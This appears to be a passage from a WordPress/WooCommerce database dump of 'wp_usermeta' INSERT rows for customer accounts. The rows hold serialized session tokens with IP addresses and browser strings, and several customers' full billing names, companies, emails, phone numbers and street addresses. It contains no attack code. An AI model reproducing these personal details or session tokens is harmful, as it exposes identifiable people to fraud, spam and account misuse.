INSERT INTO `wp_usermeta` VALUES (6900, 408, 'nickname', 'mdirmyer'); 
INSERT INTO `wp_usermeta` VALUES (6901, 408, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6902, 408, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6903, 408, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6904, 408, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6905, 408, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6906, 408, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6907, 408, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6908, 408, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6909, 408, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6910, 408, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6911, 408, '_yoast_wpseo_profile_updated', '1485948565'); 
INSERT INTO `wp_usermeta` VALUES (6912, 408, 'session_tokens', 'a:1:{s:64:"4fcb189ae070799b63785214704b85cd828c14837c8a347063f15088da75801c";a:4:{s:10:"expiration";i:1487158166;s:2:"ip";s:12:"174.28.39.71";s:2:"ua";s:119:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12";s:5:"login";i:1485948566;}}'); 
INSERT INTO `wp_usermeta` VALUES (6913, 409, 'nickname', 'bjohnson'); 
INSERT INTO `wp_usermeta` VALUES (6914, 409, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6915, 409, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6916, 409, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6917, 409, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6918, 409, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6919, 409, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6920, 409, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6921, 409, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6922, 409, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6923, 409, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6924, 409, '_yoast_wpseo_profile_updated', '1485954482'); 
INSERT INTO `wp_usermeta` VALUES (6925, 409, 'session_tokens', 'a:1:{s:64:"3cdd1cdfa0d06af17365e1540b4ea4e3b35fc9ad7907730fcc9a7581e6c874c7";a:4:{s:10:"expiration";i:1487164083;s:2:"ip";s:13:"198.208.72.25";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1485954483;}}'); 
INSERT INTO `wp_usermeta` VALUES (6929, 410, 'nickname', 'ryoung'); 
INSERT INTO `wp_usermeta` VALUES (6930, 410, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6931, 410, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6932, 410, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6933, 410, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6934, 410, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6935, 410, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6936, 410, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6937, 410, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6938, 410, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6939, 410, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6940, 410, '_yoast_wpseo_profile_updated', '1485969558'); 
INSERT INTO `wp_usermeta` VALUES (6941, 410, 'session_tokens', 'a:1:{s:64:"f006aade34c1eb56887f57ae1431665d608fde70e87aa98eceb374296f13a994";a:4:{s:10:"expiration";i:1492713043;s:2:"ip";s:13:"173.13.84.237";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492540243;}}'); 
INSERT INTO `wp_usermeta` VALUES (6942, 361, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (6943, 411, 'nickname', 'hrichardson'); 
INSERT INTO `wp_usermeta` VALUES (6944, 411, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6945, 411, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6946, 411, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6947, 411, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6948, 411, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6949, 411, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6950, 411, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6951, 411, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6952, 411, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6953, 411, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6954, 411, '_yoast_wpseo_profile_updated', '1485988969'); 
INSERT INTO `wp_usermeta` VALUES (6955, 411, 'session_tokens', 'a:1:{s:64:"6356b45dedb50c86c26bf66950e62f9f3fc761e99e06ed2cbb3eb3cf7dfd45ee";a:4:{s:10:"expiration";i:1501809339;s:2:"ip";s:12:"12.230.39.71";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1501636539;}}'); 
INSERT INTO `wp_usermeta` VALUES (6956, 412, 'nickname', 'Stanislau.Tsikhonchyk'); 
INSERT INTO `wp_usermeta` VALUES (6957, 412, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6958, 412, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6959, 412, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6960, 412, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6961, 412, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6962, 412, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6963, 412, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6964, 412, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6965, 412, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6966, 412, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6967, 412, '_yoast_wpseo_profile_updated', '1486016047'); 
INSERT INTO `wp_usermeta` VALUES (6968, 412, 'session_tokens', 'a:1:{s:64:"69379cabf7725bb34f1bbfba887c55093893bf063bd037c2e26d760673674427";a:4:{s:10:"expiration";i:1487225649;s:2:"ip";s:13:"82.209.249.17";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1486016049;}}'); 
INSERT INTO `wp_usermeta` VALUES (6969, 413, 'nickname', 'JHROJAS'); 
INSERT INTO `wp_usermeta` VALUES (6970, 413, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6971, 413, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6972, 413, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6973, 413, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6974, 413, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6975, 413, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6976, 413, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6977, 413, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6978, 413, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6979, 413, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6980, 413, '_yoast_wpseo_profile_updated', '1486032576'); 
INSERT INTO `wp_usermeta` VALUES (6981, 413, 'session_tokens', 'a:1:{s:64:"5ecfc30fb0af9b3adc4daf75d564e866d2564b3aa1d8023b5eb5e8b2feb8a48c";a:4:{s:10:"expiration";i:1487242177;s:2:"ip";s:14:"200.85.231.148";s:2:"ua";s:75:"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)";s:5:"login";i:1486032577;}}'); 
INSERT INTO `wp_usermeta` VALUES (6982, 414, 'nickname', 'richard.m.smith'); 
INSERT INTO `wp_usermeta` VALUES (6983, 414, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6984, 414, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6985, 414, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6986, 414, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6987, 414, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6988, 414, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6989, 414, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6990, 414, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6991, 414, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6992, 414, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6993, 414, '_yoast_wpseo_profile_updated', '1486050696'); 
INSERT INTO `wp_usermeta` VALUES (6994, 414, 'session_tokens', 'a:1:{s:64:"ac0d0da83b2b3f8f0f632b1b382ffa76dda53be527f2c56906533904658521a8";a:4:{s:10:"expiration";i:1487260297;s:2:"ip";s:14:"146.165.69.140";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1486050697;}}'); 
INSERT INTO `wp_usermeta` VALUES (6995, 415, 'nickname', 'yurkon'); 
INSERT INTO `wp_usermeta` VALUES (6996, 415, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6997, 415, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6998, 415, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6999, 415, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7000, 415, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7001, 415, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7002, 415, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7003, 415, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7004, 415, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7005, 415, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7006, 415, '_yoast_wpseo_profile_updated', '1486050907'); 
INSERT INTO `wp_usermeta` VALUES (7008, 415, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7009, 416, 'nickname', 'trein'); 
INSERT INTO `wp_usermeta` VALUES (7010, 416, 'first_name', 'Tom'); 
INSERT INTO `wp_usermeta` VALUES (7011, 416, 'last_name', 'Rein'); 
INSERT INTO `wp_usermeta` VALUES (7012, 416, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7013, 416, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7014, 416, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7015, 416, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7016, 416, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7017, 416, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7018, 416, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7019, 416, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7020, 416, '_yoast_wpseo_profile_updated', '1486051571'); 
INSERT INTO `wp_usermeta` VALUES (7021, 416, 'session_tokens', 'a:1:{s:64:"44c706b76b948fb4e2d1d139dad55145fce4bd5b02d1137b166359bc826eb549";a:4:{s:10:"expiration";i:1490471393;s:2:"ip";s:11:"66.193.82.2";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490298593;}}'); 
INSERT INTO `wp_usermeta` VALUES (7022, 416, 'last_update', '1486051605'); 
INSERT INTO `wp_usermeta` VALUES (7023, 417, 'nickname', 'suimbachfk6072'); 
INSERT INTO `wp_usermeta` VALUES (7024, 417, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7025, 417, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7026, 417, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7027, 417, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7028, 417, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7029, 417, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7030, 417, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7031, 417, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7032, 417, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7033, 417, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7034, 417, '_yoast_wpseo_profile_updated', '1486051800'); 
INSERT INTO `wp_usermeta` VALUES (7035, 417, 'session_tokens', 'a:1:{s:64:"e6c873afdee5eea71a9bbc9ae5926b09cfbb56ce10a5df1f97f5c9698347705a";a:4:{s:10:"expiration";i:1487261401;s:2:"ip";s:15:"185.104.219.213";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1486051801;}}'); 
INSERT INTO `wp_usermeta` VALUES (7036, 417, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7037, 416, 'billing_first_name', 'Tom'); 
INSERT INTO `wp_usermeta` VALUES (7038, 416, 'billing_last_name', 'Rein'); 
INSERT INTO `wp_usermeta` VALUES (7039, 416, 'billing_company', 'Solid Sealing Technology'); 
INSERT INTO `wp_usermeta` VALUES (7040, 416, 'billing_email', 'trein@solidsealing.com'); 
INSERT INTO `wp_usermeta` VALUES (7041, 416, 'billing_phone', '5188743626'); 
INSERT INTO `wp_usermeta` VALUES (7042, 416, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7043, 416, 'billing_address_1', '44 Dalliba Ave.'); 
INSERT INTO `wp_usermeta` VALUES (7044, 416, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7045, 416, 'billing_city', 'Watervliet'); 
INSERT INTO `wp_usermeta` VALUES (7046, 416, 'billing_state', 'NY'); 
INSERT INTO `wp_usermeta` VALUES (7047, 416, 'billing_postcode', '12189'); 
INSERT INTO `wp_usermeta` VALUES (7048, 418, 'nickname', 'pollack'); 
INSERT INTO `wp_usermeta` VALUES (7049, 418, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7050, 418, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7051, 418, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7052, 418, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7053, 418, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7054, 418, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7055, 418, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7056, 418, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7057, 418, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7058, 418, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7059, 418, '_yoast_wpseo_profile_updated', '1486059416'); 
INSERT INTO `wp_usermeta` VALUES (7060, 418, 'session_tokens', 'a:1:{s:64:"279df8c6ebbecc360f7547052be21d515cfc898a665cfa64b72a95557313dd80";a:4:{s:10:"expiration";i:1487269017;s:2:"ip";s:12:"70.194.8.156";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1486059417;}}'); 
INSERT INTO `wp_usermeta` VALUES (7061, 418, 'billing_first_name', 'Barbara'); 
INSERT INTO `wp_usermeta` VALUES (7062, 418, 'billing_last_name', 'Pollack'); 
INSERT INTO `wp_usermeta` VALUES (7063, 418, 'billing_company', 'Michigan State Univeristy'); 
INSERT INTO `wp_usermeta` VALUES (7064, 418, 'billing_email', 'pollack@frib.msu.edu'); 
INSERT INTO `wp_usermeta` VALUES (7065, 418, 'billing_phone', '517-908-7374'); 
INSERT INTO `wp_usermeta` VALUES (7066, 418, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7067, 418, 'billing_address_1', '640 South Shaw Lane'); 
INSERT INTO `wp_usermeta` VALUES (7068, 418, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7069, 418, 'billing_city', 'East Lansing'); 
INSERT INTO `wp_usermeta` VALUES (7070, 418, 'billing_state', 'MI'); 
INSERT INTO `wp_usermeta` VALUES (7071, 418, 'billing_postcode', '48824'); 
INSERT INTO `wp_usermeta` VALUES (7072, 418, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7073, 419, 'nickname', 'James.T.Varnum.civ'); 
INSERT INTO `wp_usermeta` VALUES (7074, 419, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7075, 419, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7076, 419, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7077, 419, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7078, 419, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7079, 419, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7080, 419, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7081, 419, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7082, 419, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7083, 419, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7084, 419, '_yoast_wpseo_profile_updated', '1486146130'); 
INSERT INTO `wp_usermeta` VALUES (7085, 419, 'session_tokens', 'a:1:{s:64:"4b9056ebf33c16047c290ba05931404a7d60082ff8d072efec3083a932758c94";a:4:{s:10:"expiration";i:1487355731;s:2:"ip";s:12:"131.92.144.2";s:2:"ua";s:77:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1486146131;}}'); 
INSERT INTO `wp_usermeta` VALUES (7086, 420, 'nickname', 'victor.orduna'); 
INSERT INTO `wp_usermeta` VALUES (7087, 420, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7088, 420, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7089, 420, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7090, 420, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7091, 420, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7092, 420, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7093, 420, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7094, 420, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7095, 420, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7096, 420, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7097, 420, '_yoast_wpseo_profile_updated', '1486151442'); 
INSERT INTO `wp_usermeta` VALUES (7098, 420, 'session_tokens', 'a:1:{s:64:"83bb196b9599ef202ceb5aad95a642b8fd329f4b36fd6e94f66bc4c503c1a144";a:4:{s:10:"expiration";i:1487361043;s:2:"ip";s:14:"70.195.203.165";s:2:"ua";s:137:"Mozilla/5.0 (Linux; Android 6.0.1; SM-G935V Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36";s:5:"login";i:1486151443;}}'); 
INSERT INTO `wp_usermeta` VALUES (7099, 421, 'nickname', 'loraleebellaswm9752'); 
INSERT INTO `wp_usermeta` VALUES (7100, 421, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7101, 421, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7102, 421, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7103, 421, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7104, 421, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7105, 421, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7106, 421, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7107, 421, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7108, 421, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7109, 421, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7110, 421, '_yoast_wpseo_profile_updated', '1486155467'); 
INSERT INTO `wp_usermeta` VALUES (7111, 421, 'session_tokens', 'a:1:{s:64:"dfc4c9f33f242fa84d63e2daab976a2fd6f33a15014ed3446bfc7acfd0884d1a";a:4:{s:10:"expiration";i:1487365068;s:2:"ip";s:14:"191.101.73.217";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1486155468;}}'); 
INSERT INTO `wp_usermeta` VALUES (7112, 421, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7113, 422, 'nickname', 'shavonmaranoza1927'); 
INSERT INTO `wp_usermeta` VALUES (7114, 422, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7115, 422, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7116, 422, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7117, 422, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7118, 422, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7119, 422, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7120, 422, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7121, 422, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7122, 422, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7123, 422, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7124, 422, '_yoast_wpseo_profile_updated', '1486207893'); 
INSERT INTO `wp_usermeta` VALUES (7125, 422, 'session_tokens', 'a:1:{s:64:"a1e552226601aa5586d073a8ea4daeb9c57c094e9cf543777862eaaa60eac264";a:4:{s:10:"expiration";i:1487417494;s:2:"ip";s:15:"185.104.219.245";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1486207894;}}'); 
INSERT INTO `wp_usermeta` VALUES (7126, 422, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7127, 423, 'nickname', 'john.smith'); 
INSERT INTO `wp_usermeta` VALUES (7128, 423, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7129, 423, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7130, 423, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7131, 423, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7132, 423, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7133, 423, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7134, 423, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7135, 423, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7136, 423, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7137, 423, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7138, 423, '_yoast_wpseo_profile_updated', '1486398083'); 
INSERT INTO `wp_usermeta` VALUES (7139, 423, 'session_tokens', 'a:1:{s:64:"e8859110e82729fb70f42a8536cc18d417c3ccc05b1988a4c8dd339da828720e";a:4:{s:10:"expiration";i:1487607684;s:2:"ip";s:11:"4.34.71.234";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1486398084;}}'); 
INSERT INTO `wp_usermeta` VALUES (7140, 423, 'billing_first_name', 'John'); 
INSERT INTO `wp_usermeta` VALUES (7141, 423, 'billing_last_name', 'Smith'); 
INSERT INTO `wp_usermeta` VALUES (7142, 423, 'billing_company', 'Acuitybrands'); 
INSERT INTO `wp_usermeta` VALUES (7143, 423, 'billing_email', 'john.smith@hotmail.com'); 
INSERT INTO `wp_usermeta` VALUES (7144, 423, 'billing_phone', '5074545113'); 
INSERT INTO `wp_usermeta` VALUES (7145, 423, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7146, 423, 'billing_address_1', '3760 W 4th'); 
INSERT INTO `wp_usermeta` VALUES (7147, 423, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7148, 423, 'billing_city', 'Winona'); 
INSERT INTO `wp_usermeta` VALUES (7149, 423, 'billing_state', 'MN'); 
INSERT INTO `wp_usermeta` VALUES (7150, 423, 'billing_postcode', '55987'); 
INSERT INTO `wp_usermeta` VALUES (7151, 424, 'nickname', 'rsteinhart'); 
INSERT INTO `wp_usermeta` VALUES (7152, 424, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7153, 424, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7154, 424, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7155, 424, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7156, 424, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7157, 424, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7158, 424, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7159, 424, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7160, 424, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7161, 424, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7162, 424, '_yoast_wpseo_profile_updated', '1486405065'); 
INSERT INTO `wp_usermeta` VALUES (7163, 424, 'session_tokens', 'a:1:{s:64:"d494466a2fa8c4c661248a3f75cad4d002317ed52029b4b79d9fc91865829f60";a:4:{s:10:"expiration";i:1488131989;s:2:"ip";s:14:"70.167.209.163";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487959189;}}'); 
INSERT INTO `wp_usermeta` VALUES (7164, 380, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7165, 425, 'nickname', 'hongxi.zhang1'); 
INSERT INTO `wp_usermeta` VALUES (7166, 425, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7167, 425, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7168, 425, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7169, 425, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7170, 425, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7171, 425, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7172, 425, 'use_ssl', '0'); 
